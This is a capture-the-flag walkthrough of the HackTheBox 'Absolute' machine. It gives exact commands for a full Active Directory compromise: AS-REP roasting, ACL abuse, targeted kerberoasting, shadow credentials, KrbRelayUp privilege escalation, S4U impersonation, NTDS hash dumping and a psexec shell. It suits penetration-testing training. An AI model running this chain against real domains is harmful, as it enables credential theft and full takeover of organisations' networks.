23 KiB
HackTheBox - Absolute
NMAP
Nmap scan report for 10.10.11.181
Host is up (0.11s latency).
Not shown: 65508 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Absolute
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-09-25 02:06:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Issuer: commonName=absolute-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2022-06-09T08:14:24
| Not valid after: 2023-06-09T08:14:24
| MD5: bfc0 67ac a80d 4a43 c767 70e3 daac 4089
|_SHA-1: d202 0dbd 811c 7e36 ad9e 120b e6eb a110 8695 f3f7
|_ssl-date: 2022-09-25T02:08:58+00:00; +7h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Issuer: commonName=absolute-DC-CA
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Issuer: commonName=absolute-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2022-06-09T08:14:24
| Not valid after: 2023-06-09T08:14:24
| MD5: bfc0 67ac a80d 4a43 c767 70e3 daac 4089
|_SHA-1: d202 0dbd 811c 7e36 ad9e 120b e6eb a110 8695 f3f7
|_ssl-date: 2022-09-25T02:08:58+00:00; +7h00m00s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Issuer: commonName=absolute-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49681/tcp open msrpc Microsoft Windows RPC
49682/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
49704/tcp open msrpc Microsoft Windows RPC
54894/tcp open msrpc Microsoft Windows RPC
PORT 445 (SMB)
Checking for anonymous login for smb share but it doesn't list any shares
PORT 80 (HTTP)
The site only shows a static page with nothing to interact it, so fuzzing for files and directories with gobuster
So now fuzzing for subdomain or vhost with wfuzz
This didn't find anything, going back to the site, we can see that there are some images which doesn't show anything meaningful but if check the exif data it does reveal usernames
We can try grabbing the usernames from all images using exiftool with oneliner
exiftool *.jpg | grep Author | awk {'print $3,$4'}
We have usernames but we need to figure out which format is used for usernames on the domain like the username could be in format of firstname.lastname, first initial.lastname and so on for that I used a tool called Username Anarchy
username-anarchy -i ./names.txt -f firstlast,first.last
Now that have the usernames in format, we can use kerbrute to see which usernames exist in domain if we have generated the names in a proper format
kerbrute userenum ./generated_names.txt -d absolute.htb --dc 10.10.11.181
From the output we can see kerbrute tried to authenticate and it found d.klay doesn't have pre-authentication enabled which led to AS-REP roasting, before we go cracking this hash, hashcat doesn't support cracking etype 18 so we need to use impacket's GetNPUsers
python3 GetNPUsers.py absolute.htb/uwu@dc.absolute.htb -
erated_names.txt -request
This hash can now be cracked with hashcat as it supports etype 23
hashcat -a 0 -m 18200 ./hash.txt /opt/SecLists/Passwords/rockyou.txt --force
I tried using the credentials on rpc and smb but got an account restriction error
Credentials didn't worked on ldap as well, I tried password spraying which should that none of the valid usernames are allowed on smb
So this could mean that NTLM authentication is disabaled, let's try using kerberos based authentication and for that we'll need d.klay's TGT with getTGT from impacket script
python3 getTGT.py absolute.htb/d.klay
Now using smbclient.py from impacket we can perform kerberos authentication to list shares
python3 smbclient.py absolute.htb/d.klay@dc.absolute.htb -k -no-pass -debug
But it shows a clock skew error which means that we need to synchronize our time with domain controller
sudo ntpdate 10.10.11.181
The only shares that were accessible by this user were NETLOGON and SYSVOL which doesn't seem to have anything interesting, logging in through rpcclien with kerberos auth by setting up krb5.conf
[libdefaults] default_realm = ABSOLUTE.HTB
[realms]
ABSOLUTE.HTB = {
kdc = 10.10.11.181
}
We can get more users throughenumdomusers`
rpcclient -U absolute.htb/d.klay dc.absolute.htb -k
I checked if there wasn't pre-auth flag set on the new users we got
Which wasn't the case, I decided to go back and check ldap through kerberos auth and neede to update cme as it was giving an error on ldap
Now checking if we can access ldap
poetry run crackmapexec ldap 10.10.11.181 -k --kdcHost dc.absolute.htb --users
We have the password for svc_smb user which is AbsoluteSMBService123!, we need to generate TGT again for this user to access smb and see which shares we can access now
Listing shares with cme we can see that this user can acess Shared
From shared, we see two files
From compile.sh it seems that it's compiled in nim
Running the exe on windows machine, it doesn't show any output
Adding host name in c:\windows\system32\drivers\etc\hosts
After adding the hostname, if we check wireshark after running the exe, we'll see that it's try to connect to LDAP using credentials
On opening the packet, we'll get the password for m.lovegod which is AbsoluteLDAP2022!
This user didn't gave us any special access, so having no hope on moving forward JazzPizazz showed a ray of hope
python3 bloodhound.py -u m.lovegod -k -d absolute.htb -dc dc.absolute.htb -no-pass -c
all -ns 10.10.11.181
This worked and we have domain data which we can import it on bloodhound
Checking in which group is m.lovegod part of
Here we see that he is a member of three groups where Networkers looks like a custom group, if we enumerate this group
It has WriteOwner permissions on Network Audit object, further looking into that group it has GenericWrite on winrm_user
So the path we need to follow is, m.lovegod is a part of networkers group and has WriteOwner ACL, we can become owner of that grouup,and grant permissions to add members in Network Audit group and then we can add a SPN to winrm_user and then kerberoast it which is known as targeted kerberoasting.
But the problem is we don't have a shell and for doing that we need powerview or ADModule so I tried powerview.py and ldap_shell but they didn't worked but ldapsearch was workig and we see keycredential properpty which we abuse as well
ldapsearch -LLL -Y GSSAPI -H ldap://dc.absolute.htb -b "dc=absolute,dc=htb"
I saw a tweet from Shutdown which gave me hope again
Further digging into it, I found a resource for abusing WriteOwner using the author's script
But this script isn't merged with the current impacket repo, so we need to create a python virtual environment and install impacket so that it doesn't mess up with the current impacket installed
Having the virutal environment created clone the repo
git clone --branch dacledit https://github.com/ShutdownRepo/impacket.git
Copy the owneredit.py by from owneredit branch and install impacket
Once it's installed with owneredit we are going to make m.lovegod the owner of network audit group
python3 ./owneredit.py -action write -target 'NETWORK AUDIT' -new-owner 'm.lovegod' 'absolute.htb'/'m.lovegod' -k -no-pass -dc-ip 10.10.11.181
Now being the owner of aduit group we can give full control to m.lovegod to do anything with the group like adding group members so that m.lovegod can have generic write on win_rm user
python3 dacledit.py -action 'write' -rights 'FullControl' -principal 'm.lovegod' -target 'NETWORK AUDIT' 'absolute.htb'/'m.lovegod' -k -no-pass -dc-ip 10.10.11.181
All that is left is to add m.lovegod to audit group with net rpc
net rpc group addmem 'Network Audit' 'm.lovegod' -U absolute.htb/m.lovegod -S dc.absolute.htb -k
We need to get the TGT again as the permissions or configurations will be revoked
With targeted kerberoasting we can add SPN to winrm_user and request for a TGS
python3 ./targetedKerberoast.py -d absolute.htb -u m.lovegod --dc-ip 10.10.11.181 -k --no-pass -v
But this hash was not crackable
All this could be done with windows as well machine and synchronized time with DC, we can do it with w32tm but we do need to start the service
net start w32time
w32tm /config /manualpeerlist:dc.absolute.htb /syncfromflags:MANUAL /reliable:yes /update
Now having synchronzied with the domain controller we can use PowerView but for that we needed to make some configurations in host file and the openvpn adapter because without that it won't work properly and will show this
$SecPassword = ConvertTo-SecureString 'AbsoluteLDAP2022!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('absolute.htb\m.lovegod', $SecPassword)
So to make this work we need to add the domain controller's IP as the DNS server in openvpn adapter's settings
Make sure dc.absolute.htb isn't in the hosts file
And now our powerview commands will work
Since I am on a windows machine and I had previously made m.lovegod the owner of network audit group but I did that on linux and a day was passed since I had done that so chances are that might have been revoked so I'll just do that powerview
Set-DomainObjectOwner -Credential $Cred -Identity "NETWORK AUDIT" -OwnerIdentity "m.lovegod" -Domain 'absolute.htb'-DomainController dc.absolute.htb -V
Now giving him the full control again
Add-DomainObjectAcl -TargetIdentity "NETWORK AUDIT" -PrincipalIdentity m.lovegod -Rights All -Verbose -Credential $Cred -Domain 'absolute.htb'
Now adding m.lovegod in network audit's group so that we can abuse generic write by doing targeted kerberoasting
Add-DomainGroupMember -Identity 'NETWORK AUDIT' -Members 'm.lovegod' -Domain 'absolute.htb' -Credential $Cred -Verbose
We can verfiy if m.lovegod is added in the group
Now when setting the SPN for winrm_user, it wasn't working probably because of clean up script doing their job but not really sure why it didn't worked as I was providing the command one after the other
Set-DomainObject -Identity 'winrm_user' -Set @{serviceprincipalname='MSSQL/UwU'} -Domain 'absolute.htb' -DomainController dc.absolute.htb -Credential $Cred -Verbose
So what we can do is, repeat the same process by making m.lovegod the owner of audit group, give full control, add m.lovegod into the audit group and then generate TGT, this will reatiain the configurations or the session regardless of what we have configured being removed
Checking if the ticket has been loaded
Running targetedkerberosat to set a SPN on winrm_user
python3 ./targetedKerberoast.py -d absolute.htb -k --no-pass --dc-ip 10.10.11.181 --request-user winrm_user -vv
From the ldapsearch we can see that there's credential key set, well we can edit the properties in GenericWrite so we can add that as well with pywhisker this will update or create msDS-KeyCredentialLink which is related to ADCS realm
python3 ./pywhisker.py -a add --dc-ip 10.10.11.181 -d absolute.htb -u 'm.lovegod' -k --no-pass -t winrm_user
Following PKINIT tools we can request for a TGT and then with that we can get the NTHash but for that we need to have minikerberos installed
python3 ./gettgtpkinit.py -cert-pfx ../pywhisker/luUEOlxx.pfx -pfx-pass p9nq1oiCzfgRbOWKMZWQ absolute.htb/winrm_user winrm_user.ccache
Export the TGT ticket
python3 ./getnthash.py -key 1b9d937e95c70cc1dd37ad5c67be8d6ff7617fb8438d012236e0f4b3e1cb1e91 absolute.htb/winrm_user
This can also be doing through rubeus by transferring the pfx file and asking for a tgt with the nthash
Rubeus.exe asktgt /user:winrm_user /certificate:luUEOlxx.pfx /password:p9nq1oiCzfgRbOWKMZWQ /domain:absolute.htb /domaincontroller:dc.absolute.htb /getcredentials /show
We can't really do much with the NThash but thet TGT can be helpful, we can use that on WinRM to get a shell for that I found a ruby script which works with kerberos for winrm
After cloning the repo we will run into a problem
winrm_kerb_shell.rb -s dc.absolute.htb -r ABSOLUTE.HTB
This can be resolved by following this which tells to add the domain name in capital in the hosts file
https://github.com/edenhill/librdkafka/issues/2117
Now the script will work perfectly
After authenticating with winrm service this will save the service principal for winrm and we can use evil-winrm
evil-winrm -i dc.absolute.htb -r ABSOLUTE.HTB
We can run winpeas on the machine since defender is disabled and on running we'll see that it shows system is vulnerable to krbrealyUP
We can abuse this by following this post
https://icyguider.github.io/2022/05/19/NoFix-LPE-Using-KrbRelay-With-Shadow-Credentials.html https://github.com/Dec0ne/KrbRelayUp
To comiple krblreayup we need vs studio, after compiling we can transfer the executable on the target machine
By following the blog post we can abuse shadowcredentials through Krbrelayup, on running that it wasn't able to execute probably we need other cls ID
We can check for differenet clsids from here https://ohpe.it/juicy-potato/CLSID/Windows_10_Pro/
This time we get an access denied so we have gotten the clsid correct but it isn't accessible so probably we'll need a different user to run this exe with like m.lovegod. But issue was running exe with a different user was pain as I tried Invoke-Command and some Runas scripts which didn't worked but the one which did work was RunasCS
https://github.com/antonioCoco/RunasCs
RunasCs.exe m.lovegod 'AbsoluteLDAP2022!' -d absolute.htb 'C:\Users\winrm_user\Documents\KrbRelayUp.exe full -m shadowcred --ForceShadowCred -cls 3c6859ce-230b-48a4-be6c-932c0c202048' -l 9
Now using Rubeus to get TGT for DC$ machine account with the generated certificate
.\Rubeus.exe asktgt /user:DC$ /certificate:cert /password:password /enctype:AES256 /nowrap
Having the ticket we can now impersonate as the administrator user with a S4U
.\Rubeus.exe s4u /self /user:DC$ /impersonateuser:administrator /msdsspn:host/dc.absolute.htb /ticket:kirbi_ticket
Converting the administrator's .kirbi ticket to ccache so that we can use it with impacket scripts
echo "kirbiticket" | base64 -d > kirbiticket.kirbi
Converting it into ccache ticket with ticketconverter
ticketConverter.py kirbiticket.kirbi ticket.ccache
Having the administrator's TGT we can dump the SAM and NTDS.dit hashes
secretsdump.py absolute.htb/administrator@dc.absolute.htb -k -no-pass
And can use any of the execs from impacket, I used psexec to get a shell
psexec.py -k -no-pass absolute.htb/administrator@dc.absolute.htb
References
- https://github.com/urbanadventurer/username-anarchy
- https://hashcat.net/wiki/doku.php?id=example_hashes
- https://python-poetry.org/docs/#installing-with-the-official-installer
- https://wiki.porchetta.industries/getting-started/installation/installation-on-unix
- https://itnursery.com/ldapsearch-and-kerberos-authentication/
- https://twitter.com/PizazzJazz/status/1574360409846337537?t=uQ32qRfo2Cl5M5lCDJCGuA&s=19
- https://github.com/jazzpizazz/BloodHound.py-Kerberos
- https://www.thehacker.recipes/ad/movement/dacl/grant-rights
- https://www.thehacker.recipes/ad/movement/dacl/grant-ownership
- https://twitter.com/_nwodtuhs/status/1525527323667218432?lang=en
- https://github.com/ShutdownRepo/impacket/tree/owneredit
- https://github.com/ShutdownRepo/impacket/tree/dacledit
- https://community.spiceworks.com/how_to/160048-work-with-ntp-via-powershell
- https://www.thehacker.recipes/ad/movement/dacl/targeted-kerberoasting
- https://github.com/ShutdownRepo/pywhisker
- https://github.com/dirkjanm/PKINITtools
- https://github.com/skelsec/minikerberos
- https://github.com/edenhill/librdkafka/issues/2117
- https://forum.hackthebox.com/t/simple-winrm-shell-via-kerberos/1870
- https://stackoverflow.com/questions/18760281/how-do-i-increase-the-scrollback-buffer-size-in-tmux
- https://github.com/DarkCoderSc/run-as
- https://notes.vulndev.io/notes/redteam/payloads/windows
- https://icyguider.github.io/2022/05/19/NoFix-LPE-Using-KrbRelay-With-Shadow-Credentials.html
- https://github.com/Dec0ne/KrbRelayUp
- https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato
- https://github.com/antonioCoco/RunasCs
- https://ohpe.it/juicy-potato/CLSID/Windows_10_Pro/